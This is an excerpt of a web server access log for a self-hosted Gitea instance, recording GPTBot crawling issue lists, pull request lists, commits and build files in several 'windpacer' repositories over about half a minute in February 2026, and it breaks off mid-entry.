GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fsrc%2fold_controller.cpp" [Client 74.7.227.38] [Length 22889] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" +[17/Feb/2026:18:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2flog_macros.hpp" [Client 74.7.227.38] [Length 23368] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fmodbus_tcp.hpp" [Client 74.7.227.38] [Length 26612] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fmodbus_tcp.hpp" [Client 74.7.227.38] [Length 19519] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fdata_format.hpp" [Client 74.7.227.38] [Length 26000] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:53:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:53:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:18:53:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:54:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=all&type=all" +[17/Feb/2026:18:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" +[17/Feb/2026:18:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:18:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11435] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11434] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:18:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:18:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:18:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:18:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:18:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt?display=rendered" [Client 74.7.227.38] [Length 11217] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:18:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 11113] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:18:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=latest&state=open&type=all" +[17/Feb/2026:18:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=latest&state=open&type=all" +[17/Feb/2026:18:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13361] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:18:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10142] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:18:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:18:54:20 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" +[17/Feb/2026:18:54:21 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" +[17/Feb/2026:18:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:54:22 +0000] - 303 303 - GET https 